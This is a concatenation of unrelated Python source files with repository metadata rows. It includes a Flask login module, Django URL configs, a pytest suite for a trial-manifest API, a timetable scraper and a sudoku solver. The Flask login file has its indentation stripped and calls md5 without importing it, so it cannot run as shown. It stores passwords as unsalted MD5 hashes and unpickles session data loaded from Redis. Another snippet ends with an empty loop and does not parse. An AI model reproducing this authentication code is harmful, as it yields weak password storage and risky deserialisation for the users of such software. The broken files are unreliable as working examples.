from flask import request, session
from flask_login import LoginManager, login_user, logout_user, current_user
import pickle
from datetime import timedelta
from uuid import uuid4
from redis import Redis
from werkzeug.datastructures import CallbackDict
from flask.sessions import SessionInterface, SessionMixin
from . import app
from models.User import User
from utils.utils import gen_reply
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = 'login'
class RedisSession(CallbackDict, SessionMixin):
def __init__(self, initial=None, sid=None, new=False):
def on_update(self):
self.modified = True
CallbackDict.__init__(self, initial, on_update)
self.sid = sid
self.new = new
self.modified = False
class RedisSessionInterface(SessionInterface):
serializer = pickle
session_class = RedisSession
def __init__(self, redis=None, prefix='session:'):
if redis is None:
redis = Redis()
self.redis = redis
self.prefix = prefix
def generate_sid(self):
return str(uuid4())
def get_redis_expiration_time(self, app, session):
if session.permanent:
return app.permanent_session_lifetime
return timedelta(days=1)
def open_session(self, app, request):
sid = request.cookies.get(app.session_cookie_name)
if not sid:
sid = self.generate_sid()
return self.session_class(sid=sid, new=True)
val = self.redis.get(self.prefix + sid)
if val is not None:
data = self.serializer.loads(val)
return self.session_class(data, sid=sid)
return self.session_class(sid=sid, new=True)
def save_session(self, app, session, response):
domain = self.get_cookie_domain(app)
if not session:
self.redis.delete(self.prefix + session.sid)
if session.modified:
response.delete_cookie(app.session_cookie_name,
domain=domain)
return
redis_exp = self.get_redis_expiration_time(app, session)
cookie_exp = self.get_expiration_time(app, session)
val = self.serializer.dumps(dict(session))
self.redis.setex(self.prefix + session.sid, val,
int(redis_exp.total_seconds()))
response.set_cookie(app.session_cookie_name, session.sid,
expires=cookie_exp, httponly=True,
domain=domain)
@login_manager.user_loader
def load_user(id_):
return app.db.query(User).get(id_)
@app.route('/api/v1.0/login', methods=['POST'])
def login():
try:
params = request.json
username = params['login']
password = params['password']
except Exception as e:
error = 'Не удалось разобрать параметры запроса: {error}'.format(error=e)
app.logger.error(error)
return gen_reply(code=400, info=error)
password = md5(password.encode()).hexdigest()
registered_user = \
app.db.query(User).filter_by(username=str(username),
password=str(password),
enabled=True).first()
if registered_user is None:
app.logger.error('Имя пользователя или пароль указаны не верно (login: {}).'.format(username))
return gen_reply(code=400, info='Не правильно указаны логин/пароль.')
login_user(registered_user, remember=False)
current_user.is_authenticated = True
session['config'] = registered_user.get_config()
session['user_id'] = registered_user.id
session['login'] = registered_user.username
session['email'] = registered_user.email
session['full_name'] = registered_user.description
user_session = {
'user_id': session['user_id'],
'login': session['login'],
'email': session['email'],
'config': session['config'],
'full_name': session['full_name']
}
return gen_reply(data=user_session, info='Successful authentication.')
@app.route('/api/v1.0/logout', methods=['GET'])
def logout():
logout_user()
return gen_reply(code=200, info='User logged out.')
| UTF-8 | Python | false | false | 4,386 | py | 45 | login.py | 27 | 0.624271 | 0.619837 | 0 | 133 | 31.218045 | 102 |
OPSRv/backend-mangust | 4,801,773,443,131 | ace675d8cf9fc162ba3bf2f0379d84a623f0f7cc | 1bfdd8eb9857468ad44a522c5b81409f6e4e14e9 | /advertising/urls.py | 792a3f69bf35b478ec46bad4e5f7d208ac3dda44 | [] | no_license | https://github.com/OPSRv/backend-mangust | 75238af8e807b253971b1bee3f87d533fc7cbef3 | 7b40518be0b0c0bbed1da148f7ced18fe05e7be7 | refs/heads/main | 2023-08-14T00:28:49.449284 | 2021-10-14T01:18:34 | 2021-10-14T01:18:34 | 415,135,478 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from . import views
urlpatterns = [
path('api/advertising/', views.AdvertisingList.as_view()),
]
urlpatterns = format_suffix_patterns(urlpatterns)
| UTF-8 | Python | false | false | 244 | py | 33 | urls.py | 33 | 0.778689 | 0.778689 | 0 | 9 | 26.111111 | 62 |
CIMAC-CIDC/cidc-api-gae | 8,753,143,388,037 | 7406f78845076c45e53f7f6f4d45f59e119b19e0 | 7a8c854cb3c4bfe58ecb0a98a4b96e9fa0ee84f3 | /tests/models/test_csms_api.py | 86207f7248a5d2e2995898f0905b0ea9e1f02005 | [
"MIT"
] | permissive | https://github.com/CIMAC-CIDC/cidc-api-gae | 026eeaa5775817538e0adec4d26d31b7f1d944cf | 0c3b02ffd69473bb4b6f81343c1ff3c4d4486031 | refs/heads/master | 2023-08-08T13:24:42.778281 | 2023-07-27T02:32:40 | 2023-07-27T02:32:40 | 194,138,223 | 2 | 6 | MIT | false | 2023-08-16T18:15:01 | 2019-06-27T17:38:32 | 2023-02-21T13:13:07 | 2023-08-16T18:14:59 | 2,978 | 1 | 2 | 1 | Python | false | false | import os
os.environ["TZ"] = "UTC"
from copy import deepcopy
import pytest
from cidc_api.models import TrialMetadata
from cidc_api.models.csms_api import *
from cidc_api.config.settings import PRISM_ENCRYPT_KEY
from cidc_schemas.prism.core import (
_check_encrypt_init,
_encrypt,
set_prism_encrypt_key,
)
from ..csms.data import manifests
from ..csms.utils import validate_json_blob
from ..resources.test_trial_metadata import setup_user
# make sure that the encryption key is set
try:
_check_encrypt_init()
except:
set_prism_encrypt_key(PRISM_ENCRYPT_KEY)
def manifest_change_setup(cidc_api, monkeypatch):
setup_user(cidc_api, monkeypatch)
# also checks for trial existence in JSON blobs
metadata_json = {
"protocol_identifier": "test_trial",
"participants": [
# existing participant with encrypted participant_id
# to make sure that the CSMS API is encrypting new IDs as expected
{
"cimac_participant_id": "CTTTP04",
"participant_id": _encrypt("LOCAL 04"),
"cohort_name": "Arm_A",
"samples": [],
},
],
"shipments": [],
"allowed_cohort_names": ["Arm_A", "Arm_Z"],
"allowed_collection_event_names": [
"Baseline",
"Pre_Day_1_Cycle_2",
"On_Treatment",
],
}
TrialMetadata(trial_id="test_trial", metadata_json=metadata_json).insert()
# need a second valid trial
metadata_json["protocol_identifier"] = "foo"
TrialMetadata(trial_id="foo", metadata_json=metadata_json).insert()
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# insert manifest before we check for changes
insert_manifest_into_blob(deepcopy(manifest), uploader_email="test@email.com")
# should check out, but let's make sure
validate_json_blob(
TrialMetadata.select_for_update_by_trial_id("test_trial").metadata_json
)
def test_detect_changes_when_excluded(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
manifest = [m for m in manifests if m.get("excluded")][0]
assert detect_manifest_changes(manifest, uploader_email="test@email.com") == (
[]
)
def test_change_protocol_identifier_error(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Test critical changes throws Exception on samples
# a bad ID raises a no trial found like insert_manifest_...
with pytest.raises(Exception, match="No trial found with id"):
# stored on samples, not manifest
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{
k: v if k != "protocol_identifier" else "bar"
for k, v in sample.items()
}
for sample in new_manifest["samples"]
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
# a good ID raises a new manifst error
with pytest.raises(NewManifestError):
# stored on samples, not manifest
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{
k: v if k != "protocol_identifier" else "foo"
for k, v in sample.items()
}
for sample in new_manifest["samples"]
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
def test_change_manifest_id_error(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
for n, manifest in enumerate(manifests):
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# manifest_id has no such complication, but is also on the samples
# changing the manifest_id makes it new
with pytest.raises(NewManifestError):
new_manifest = deepcopy(manifest)
new_manifest["manifest_id"] = "foo"
new_manifest["samples"] = [
{k: v if k != "manifest_id" else "foo" for k, v in sample.items()}
for sample in new_manifest["samples"]
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
def test_change_cimac_id_error(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Changing a cimac_id is adding/removing a Sample
## so this is a different error
with pytest.raises(Exception, match="Malformatted cimac_id"):
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{k: v if k != "cimac_id" else "foo" for k, v in sample.items()}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
# need to use an actually valid cimac_id
with pytest.raises(Exception, match="Missing sample"):
new_manifest = deepcopy(manifest)
new_manifest["samples"] = [
{
k: v if k != "cimac_id" else "CXXXP0555.00"
for k, v in sample.items()
}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
detect_manifest_changes(new_manifest, uploader_email="test@email.com")
def test_manifest_non_critical_changes(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
# Test non-critical changes on the manifest itself
keys = {k for manifest in manifests for k in manifest.keys()}
for key in keys:
if key in [
# changing manifest_id would throw NewManifestError
"manifest_id",
# ignored by _calc_differences
"barcode",
"biobank_id",
"entry_number",
"excluded",
"json_data",
"modified_time",
"modified_timestamp",
"qc_comments",
"sample_approved",
"sample_manifest_type",
"samples",
"status",
"submitter",
# ignore ignored CSMS fields
"submitter",
"reason",
"event",
"study_encoding",
"status_log",
]:
continue
# grab a completed manifest
for manifest in manifests:
if (
manifest.get("status") not in (None, "qc_complete")
or manifest.get("excluded")
or key not in manifest
):
continue
new_manifest = deepcopy(manifest)
new_manifest[key] = "foo"
changes = detect_manifest_changes(
new_manifest, uploader_email="test@email.com"
)
assert len(changes) == 1 and changes[0] == Change(
entity_type="shipment",
manifest_id=manifest["manifest_id"],
trial_id=manifest["samples"][0]["protocol_identifier"],
changes={
key: (
manifest[key],
"foo",
)
},
), str(changes)
def test_manifest_non_critical_changes_on_samples(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
# grab a completed manifest
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Test non-critical changes for the manifest but stored on the samples
for key in ["assay_priority", "assay_type", "sample_manifest_type"]:
if key not in manifest["samples"][0]:
continue
new_manifest = deepcopy(manifest)
if key == "sample_manifest_type":
new_manifest["samples"] = [
{k: v for k, v in sample.items()}
for sample in new_manifest["samples"]
]
for n in range(len(new_manifest["samples"])):
new_manifest["samples"][n].update(
{
"processed_sample_type": "foo",
"sample_manifest_type": "Tissue Scroll",
"processed_sample_derivative": "Germline DNA",
}
)
else:
new_manifest["samples"] = [
{k: v if k != key else "foo" for k, v in sample.items()}
for sample in new_manifest["samples"]
]
changes = detect_manifest_changes(
new_manifest, uploader_email="test@email.com"
)
if key != "sample_manifest_type":
assert len(changes) == 1 and changes[0] == Change(
entity_type="shipment",
manifest_id=manifest["manifest_id"],
trial_id=manifest["samples"][0]["protocol_identifier"],
changes={key: (manifest["samples"][0][key], "foo")},
), str(changes)
def test_sample_non_critical_changes(cidc_api, clean_db, monkeypatch):
with cidc_api.app_context():
manifest_change_setup(cidc_api, monkeypatch)
# grab a completed manifest
for manifest in manifests:
if manifest.get("status") not in (None, "qc_complete") or manifest.get(
"excluded"
):
continue
# Test non-critical changes on the samples
for key in manifest["samples"][0].keys():
if key in [
# ignore critical changes
"cimac_id",
"collection_event_name",
"manifest_id",
"protocol_identifier",
"recorded_collection_event_name",
"sample_key",
# ignore non-sample level changes
# see test_manifest_non_critical_changes_on_samples
"assay_priority",
"assay_type",
*manifest,
"processed_sample_derivative",
"processed_sample_type",
"receiving_party",
"trial_participant_id",
"type_of_sample",
# ignore list from calc_diff
"barcode",
"biobank_id",
"entry_number",
"event",
"excluded",
"json_data",
"modified_time",
"modified_timestamp",
"qc_comments",
"reason",
"sample_approved",
"sample_manifest_type",
"samples",
"status",
"status_log",
"study_encoding",
"submitter",
]:
continue
new_manifest = deepcopy(manifest)
if key in ["sample_derivative_concentration"]:
new_manifest["samples"] = [
{k: v if k != key else 10 for k, v in sample.items()}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
else:
new_manifest["samples"] = [
{k: v if k != key else "foo" for k, v in sample.items()}
if n == 0
else sample
for n, sample in enumerate(new_manifest["samples"])
]
changes = detect_manifest_changes(
new_manifest, uploader_email="test@email.com"
)
# name change for when we're looking below
if key == "standardized_collection_event_name":
key = "collection_event_name"
elif key == "fixation_or_stabilization_type":
key = "fixation_stabilization_type"
assert len(changes) == 1 and changes[0] == Change(
entity_type="sample",
manifest_id=manifest["manifest_id"],
cimac_id=manifest["samples"][0]["cimac_id"],
trial_id=manifest["samples"][0]["protocol_identifier"],
changes={
key: (
type(changes[0].changes[key][0])(
manifest["samples"][0][
"standardized_collection_event_name"
if key == "collection_event_name"
and "standardized_collection_event_name"
in manifest["samples"][0]
else (
"fixation_stabilization_type"
if key == "fixation_stabilization_type"
else key
)
]
),
new_manifest["samples"][0][key],
)
},
), str(changes)
def test_insert_manifest_into_blob(cidc_api, clean_db, monkeypatch):
"""test that insertion of manifest into blob works as expected"""
# grab a completed manifest
manifest = [
m
for m in manifests
if m.get("status") in (None, "qc_complete") and not m.get("excluded")
][0]
with cidc_api.app_context():
setup_user(cidc_api, monkeypatch)
# blank db throws error
with pytest.raises(Exception, match="No trial found with id"):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
metadata_json = {
"protocol_identifier": "test_trial",
"participants": [],
"shipments": [],
"allowed_cohort_names": [],
"allowed_collection_event_names": [],
}
TrialMetadata(trial_id="test_trial", metadata_json=metadata_json).insert()
with pytest.raises(Exception, match="not found within '/allowed_cohort_names/"):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
metadata_json["allowed_cohort_names"] = ["Arm_A", "Arm_Z"]
TrialMetadata.select_for_update_by_trial_id("test_trial").update(
changes={"metadata_json": metadata_json}
)
with pytest.raises(
Exception, match="not found within '/allowed_collection_event_names/"
):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
metadata_json["allowed_collection_event_names"] = [
"Baseline",
"Pre_Day_1_Cycle_2",
]
TrialMetadata.select_for_update_by_trial_id("test_trial").update(
changes={"metadata_json": metadata_json}
)
target = deepcopy(manifest)
with pytest.raises(NewManifestError):
detect_manifest_changes(target, uploader_email="test@email.com")
insert_manifest_into_blob(target, uploader_email="test@email.com")
md_json = TrialMetadata.select_for_update_by_trial_id(
"test_trial"
).metadata_json
validate_json_blob(md_json)
for other_manifest in [
m
for m in manifests
if m.get("status") in [None, "qc_complete"] and not m.get("excluded")
if m != manifest
]:
insert_manifest_into_blob(other_manifest, uploader_email="test@email.com")
md_json = TrialMetadata.select_for_update_by_trial_id(
"test_trial"
).metadata_json
validate_json_blob(md_json)
with pytest.raises(Exception, match="already exists for trial"):
insert_manifest_into_blob(manifest, uploader_email="test@email.com")
| UTF-8 | Python | false | false | 17,910 | py | 126 | test_csms_api.py | 114 | 0.492295 | 0.490061 | 0 | 458 | 38.104803 | 88 |
Rus159/muiv-timetable-bot | 18,305,150,623,873 | 56f2187b8da4e1be73fadf7fcd1ade1b0a7c6afc | 1271d05adf77d535e382c93e6cd75cbce200fee2 | /excel.py | ec56c1e90b1e3e31e75cebf2d6be8a2ca7818543 | [] | no_license | https://github.com/Rus159/muiv-timetable-bot | 796c6f06e76f31388e396ca3acef797b5c604cc4 | 4645c2c989e6eaee47bd39d959eadf883655530d | refs/heads/master | 2023-01-19T02:43:31.678452 | 2020-11-29T17:16:35 | 2020-11-29T17:16:35 | 313,402,101 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Unnamed 0: Дни недели
Unnamed 1: Дата
Unnamed 2: Время
Unnamed [3-n]: [1-(n-2)] группа
'''
import pandas as pd
import parse_link
import urllib
import logging
logging.basicConfig(format="%(levelname)s %(asctime)s %(message)s")
urllib.request
url = parse_link.parse()
filename = list(url.split('iblock/'))[1][4:]
urllib.request.urlretrieve(url, filename)
timetable = pd.ExcelFile(filename)
user_xls_association = {}
user_xls_file = []
courses_and_groups = {course: [] for course in timetable.sheet_names}
week_days = ['понедельник', 'вторник', 'среда', 'четверг', 'пятница', 'суббота']
for course in timetable.sheet_names:
sheet = timetable.parse(course)
groups = []
for column in sheet.columns:
if column[-1] not in '012':
groups.append(sheet[column][15])
courses_and_groups.update([(course, groups)])
def get_week_timetable(group, sheet):
message = {}
column = 'Unnamed: ' + str(int(list(group.split('.'))[1][0])+2)
days_index = []
for i in range(0, len(sheet)):
if sheet['Unnamed: 0'][i] in week_days:
days_index.append(i)
for i in days_index:
lesson = {}
for j in range(i, i + 11, 2) if days_index.index(i) != len(days_index) - 1 else range(i, len(sheet)-1):
if type(sheet[column][j]).__name__ != 'float':
lesson.update([(sheet['Unnamed: 2'][j], [sheet[column][j+1], sheet[column][j]])])
message.update([(sheet['Unnamed: 0'][i], lesson)])
return message
def excelFile():
return pd.ExcelFile(filename)
def get_sheetnames(xls):
return xls.sheet_names
def get_groupnames(sheet):
groups = []
for column in sheet.columns:
if column[-1] not in '012':
groups.append(sheet[column][15])
return groups
def check_file_update():
global url
global filename
if list(parse_link.parse().split('iblock/'))[1][4:] != filename:
url = parse_link.parse()
filename = list(url.split('iblock/'))[1][4:]
print(filename)
urllib.request.urlretrieve(url, filename)
logging.info('Файл обновлен')
def get_course_from_group(group_name):
for course in courses_and_groups.keys():
if group_name in courses_and_groups[course]:
return course | UTF-8 | Python | false | false | 2,353 | py | 5 | excel.py | 4 | 0.623845 | 0.607567 | 0 | 78 | 28.153846 | 111 |
zedaster/ImaevIntensive | 10,282,151,722,780 | bc6c7fc6f6879547d26cffac1a37d67c0ad997f7 | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /16/16_11.py | 2f18132bfc5ecd68500598c256eabc34eb66d1cf | [] | no_license | https://github.com/zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import functools
@functools.lru_cache()
def F(n, m):
if m == 0:
return n
else:
return F(m, n%m)
count = 0
for n in range(100, 1000+1):
for d in range(100, 1000 + 1):
| UTF-8 | Python | false | false | 199 | py | 177 | 16_11.py | 157 | 0.537688 | 0.447236 | 0 | 14 | 13.142857 | 34 |
dikatok/udacity-aind-term1 | 5,016,521,840,808 | 2764c978e55549e8affbeb820eade28b834fe879 | f36f112a6790159ed7cdc5de1a525cd6d64584bc | /P1-Sudoku/solution.py | 53b465e160b6691792022117850f1def16a0b43a | [] | no_license | https://github.com/dikatok/udacity-aind-term1 | 86f91e1c00032ce9109f084caa46f01a542439bd | c53ea60f9f28165935b6cbdf226da18b0d0f462f | refs/heads/master | 2021-07-01T08:31:13.299267 | 2017-09-20T07:51:38 | 2017-09-20T07:51:38 | 102,087,648 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
def cross(A, B):
"Cross product of elements in A and elements in B."
return [a + b for a in A for b in B]
rows = 'ABCDEFGHI'
cols = '123456789'
# list all positions in sudoku grid
boxes = cross(rows, cols)
# list every row units (from top to bottom)
row_units = [cross(r, cols) for r in rows]
# list every column units (from left to right)
column_units = [cross(rows, c) for c in cols]
# list every square units (from left to right and top to bottom)
square_units = [cross(rs, cs) for rs in ('ABC', 'DEF', 'GHI') for cs in ('123', '456', '789')]
# list boxes in left diagonal (bottom left to upper right)
left_diag_units = [[a+b for (a, b) in list(zip(rows[::-1], cols))]]
# list boxes in right diagonal (upper left to bottom right)
right_diag_units = [[a+b for (a, b) in list(zip(rows, cols))]]
# combine all units
unitlist = row_units + column_units + square_units + left_diag_units + right_diag_units
# create mapping between each box and units they are belong to
units = dict((s, [u for u in unitlist if s in u]) for s in boxes)
# create mapping between each box and their peers
peers = dict((s, set(sum(units[s], [])) - set([s])) for s in boxes)
def naked_twins(values):
"""Eliminate values using the naked twins strategy.
Args:
values(dict): a dictionary of the form {'box_name': '123456789', ...}
Returns:
the values dictionary with the naked twins eliminated from peers.
"""
# Find all instances of naked twins
# Eliminate the naked twins as possibilities for their peers
for box in values.keys():
for box_units in units[box]:
twins = [unit for unit in box_units if values[box] == values[unit]]
if len(twins) > 1 and len(twins) == len(values[box]):
for unit in box_units:
if unit not in twins:
for value in values[box]:
values[unit] = values[unit].replace(value, "")
return values
def grid_values(grid):
"""
Convert grid into a dict of {square: char} with '123456789' for empties.
Args:
grid(string) - A grid in string form.
Returns:
A grid in dictionary form
Keys: The boxes, e.g., 'A1'
Values: The value in each box, e.g., '8'. If the box has no value, then the value will be '123456789'.
"""
values = []
all_digits = '123456789'
for c in grid:
if c == '.':
values.append(all_digits)
elif c in all_digits:
values.append(c)
assert len(values) == 81
return dict(zip(boxes, values))
def display(values):
"""
Display the values as a 2-D grid.
Args:
values(dict): The sudoku in dictionary form
"""
width = 1 + max(len(values[s]) for s in boxes)
line = '+'.join(['-' * (width * 3)] * 3)
print('\n')
for r in rows:
print(''.join(values[r + c].center(width) + ('|' if c in '36' else '')
for c in cols))
if r in 'CF': print(line)
return
def eliminate(values):
"""Eliminate values from peers of each box with a single value.
Go through all the boxes, and whenever there is a box with a single value,
eliminate this value from the set of values of all its peers.
Args:
values: Sudoku in dictionary form.
Returns:
Resulting Sudoku in dictionary form after eliminating values.
"""
# preserve the original sudoku dict by performing shallow copy
new_grid = values.copy()
# eliminate impossible values for each unsolved box by looking at it's "solved" peers
for key in values.keys():
if len(values[key]) > 1:
possible_values = values[key]
for peer in peers[key]:
if len(values[peer]) == 1:
possible_values = possible_values.replace(values[peer], "")
new_grid[key] = possible_values
return new_grid
def only_choice(values):
"""Finalize all values that are the only choice for a unit.
Go through all the units, and whenever there is a unit with a value
that only fits in one box, assign the value to this box.
Input: Sudoku in dictionary form.
Output: Resulting Sudoku in dictionary form after filling in only choices.
"""
# assign the only choice for each unsolved box if exists
for unit in unitlist:
for box_key in unit:
all_values = "".join(values[unit_key] for unit_key in unit if unit_key != box_key)
for value in "123456789":
if all_values.find(value) < 0 <= values.get(box_key).find(value):
values[box_key] = value
return values
def reduce_puzzle(values):
"""Optimize/reduce the possible values of each unit.
Perform elimination and only choice strategies until all possible values are optimized.
Input: Sudoku in dictionary form.
Output: Resulting Sudoku in dictionary form after optimization.
"""
stalled = False
while not stalled:
# Check how many boxes have a determined value
solved_values_before = len([box for box in values.keys() if len(values[box]) == 1])
# Your code here: Use the Eliminate Strategy
values = eliminate(values)
values = naked_twins(values)
# Your code here: Use the Only Choice Strategy
values = only_choice(values)
# Check how many boxes have a determined value, to compare
solved_values_after = len([box for box in values.keys() if len(values[box]) == 1])
# If no new values were added, stop the loop.
stalled = solved_values_before == solved_values_after
# Sanity check, return False if there is a box with zero available values:
if len([box for box in values.keys() if len(values[box]) == 0]):
return values
return values
def search(values):
"Using depth-first search and propagation, create a search tree and solve the sudoku recursively."
values = reduce_puzzle(values)
# validate every units
for unit in unitlist:
if (len([values[box] for box in unit if len(values[box]) == 1])
!= len(set([values[box] for box in unit if len(values[box]) == 1]))) \
or any(len(values[box]) == 0 for box in unit):
return False
# check if sudoku is solved, if so then return current values which is the solution
if all(len(values[box]) == 1 for box in values.keys()):
return values
# get the unsolved box with minimum possible values
min_values, box = min((len(values[box]), box) for box in values.keys() if len(values[box]) > 1)
# preserve the original grid values at this point
copied = values.copy()
# choose 1 possible box value at one time, and recursively perform search on the remaining boxes
for value in values[box]:
copied[box] = value
result = search(copied)
# return the solution (result != False)
if result:
return result
return False
def solve(grid):
"""
Find the solution to a Sudoku grid.
Args:
grid(string): a string representing a sudoku grid.
Example: '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
Returns:
The dictionary representation of the final sudoku grid. False if no solution exists.
"""
# create sudoku grid representation as dictionary and replace unsolved boxes with all possible values
grid = grid_values(grid)
# perform DFS on grid and return the answer
return search(grid)
if __name__ == '__main__':
grid = '9.1....8.8.5.7..4.2.4....6...7......5..............83.3..6......9................'
solved_grid = solve(grid)
display(solved_grid)
| UTF-8 | Python | false | false | 7,767 | py | 4 | solution.py | 1 | 0.615682 | 0.600103 | 0 | 214 | 35.285047 | 114 |
CodingClubBITSP/Qrious-19 | 7,352,984,042,712 | e7691cedfca2af6fdbd9ade309d7a30a4a87deaa | 0f6e2a896d91d10b1266e1b4c8721961a7ece6f2 | /myapp/urls.py | 1b5b9324ded5e58aff64194af3a8ca8bed202104 | [] | no_license | https://github.com/CodingClubBITSP/Qrious-19 | 7762781f3b1db1ff7cffb4a388ead9da021cbe41 | bc7009520b1402c16b46186fae1a03dee52d3f93 | refs/heads/master | 2022-12-23T13:49:09.432737 | 2020-03-11T04:59:50 | 2020-03-11T04:59:50 | 163,874,632 | 1 | 9 | null | false | 2022-12-08T01:42:38 | 2019-01-02T18:19:45 | 2022-10-05T13:06:04 | 2022-12-08T01:42:37 | 13,558 | 1 | 10 | 6 | JavaScript | false | false | from django.conf.urls import url
from myapp.views import home, roulette, loading, l_out, quiz, userdat, intro, getquestion, leaderboard_view, realitychange, postanswer
urlpatterns = [
url(r'^$', home, name='myapp-home'),
url(r'^loading$', loading, name='myapp-load'),
url(r'^roulette$', roulette, name='myapp-roulette'),
url(r'^getInfo$', userdat, name='myapp-get-usrdata'),
url(r'^reality/get/request$', realitychange, name='myapp-post-reality'),
url(r'^(?P<filename>[^/]+)/$', intro, name='myapp-intro'),
url(r'^(?P<basename>[^/]+)/(?P<filename>[^/]+)$', quiz, name='myapp-quiz'),
url(r'^questions/reality/request$', getquestion, name='myapp-getques'),
url(r'^answer/ajax/post$', postanswer, name='myapp-post-answer'),
url(r'^leaderboard$', leaderboard_view, name='myapp-leaderboard'),
url(r'^logout$', l_out, name='myapp-logout'),
]
# /get_question
# /get_leaderboard
| UTF-8 | Python | false | false | 916 | py | 13 | urls.py | 5 | 0.657205 | 0.657205 | 0 | 18 | 49.888889 | 134 |
candyer/exercises | 16,776,142,259,279 | 733aec84608ce9a18c9d6bdd6e344d68f10005b8 | 8beb54fd35b16fc2f7fd8a503b5cac3c5d4cbf24 | /Dynamic Programming/min_coins.py | e67d02ec1a6f005e79fadec67a4aabe5a72a49ed | [] | no_license | https://github.com/candyer/exercises | e4797ad7117be0b077d6fbf41419cc2a0e9e5645 | f72eba251ed2d8fd2dfb09277ec000c75c3c8fb7 | refs/heads/master | 2021-07-12T19:42:58.141564 | 2021-03-28T22:30:46 | 2021-03-28T22:30:46 | 41,252,522 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
# Given a list of N coins, their values (V1, V2, ... , VN), and the total sum S.
# Find the minimum number of coins the sum of which is S (we can use as many coins of one type as
# we want), or return -1 that it's not possible to select coins in such a way that they sum up to S.
def solve(coins, target):
dp = [-1] * (target + 1)
dp[0] = 0
for i in range(1, target + 1):
for val in coins:
if val <= i:
if dp[i - val] != -1 and (dp[i] > dp[i - val] or dp[i] == -1):
dp[i] = dp[i - val] + 1
return dp[target]
print solve([2,3,5], 12) #3
print solve([2,4,6], 11) #-1
print solve([5,3,1], 11) #3
print solve([7,2,3,6], 13) #2
| UTF-8 | Python | false | false | 646 | py | 50 | min_coins.py | 50 | 0.591331 | 0.534056 | 0 | 18 | 34.833333 | 100 |
FCeoni/python_fundamentals | 4,664,334,486,513 | d7e7cf0d445d7a8bec88eb66900ff4de19f19a7e | 9c879aeed2205dfb3a7a91b2acfa93379b0a3831 | /Exercicios/4_GAME/personagem..py | b77c4b34e1674616de4d40e62df9559d050e257f | [] | no_license | https://github.com/FCeoni/python_fundamentals | 48d1db2104dc0a2acc69298ba0f582b1c8a13b54 | 568949bf899fbf73d917bab392ca8f71a952b2d2 | refs/heads/master | 2021-03-08T01:34:25.802973 | 2020-03-13T20:57:10 | 2020-03-13T20:57:10 | 246,031,426 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # -*- coding: utf-8 -*-
from random import randint
class Personagem:
def __init__(self):
self.hp = 100
self.xp = 0
self.mp = 100
self.nivel = 1
self.esquiva = 0
def subirNivel(self):
if self.xp > (99 * self.nivel):
self.nivel += 1
print("Level UP!")
class Mago(Personagem):
def __init__(self):
super().__init__()
self.inteligencia = True
self.msg_atq = "Magia das Trevas!!"
self.poderEspecial = 3
def recuperacaoMana(self):
if self.poderEspecial > 0:
self.mp = 100
print("Mana Recuperada!!")
self.poderEspecial -= 1
else:
print("Sem Poder Especial")
class Guerreiro(Personagem):
def __init__(self):
super().__init__()
self.forca = True
self.msg_atq = "Estocada violenta!!"
self.poderEspecial = 3
def furia(self):
if self.poderEspecial > 0:
if self.hp < 100:
self.hp += self.hp + (self.hp * 0.10)
self.poderEspecial -= 1
else:
print("HP está cheio")
else:
print("Sem Poder Especial")
| UTF-8 | Python | false | false | 1,221 | py | 22 | personagem..py | 17 | 0.496721 | 0.47377 | 0 | 49 | 23.877551 | 53 |
danieltrujillo003/myth-girls | 6,373,731,475,118 | 92b47bdd3b352c9c40408a9ce117c381d1ac3fef | 29d038e0f73a30e69d02b54b860f980162702f47 | /chicas/models.py | d45ee47e5e4cc1474a85a027c39b83b56e63b6a4 | [] | no_license | https://github.com/danieltrujillo003/myth-girls | 862e6bfb7e1b3617df964d5c95b441886dc0bb34 | 69dd4e7fb33334aa63204a403ab70ae8e20f1b86 | refs/heads/master | 2021-01-12T12:31:35.454662 | 2016-11-01T12:28:29 | 2016-11-01T12:28:29 | 72,534,622 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
#from django.contrib.auth.models import User
class new_entry(models.Model):
SPACES = (
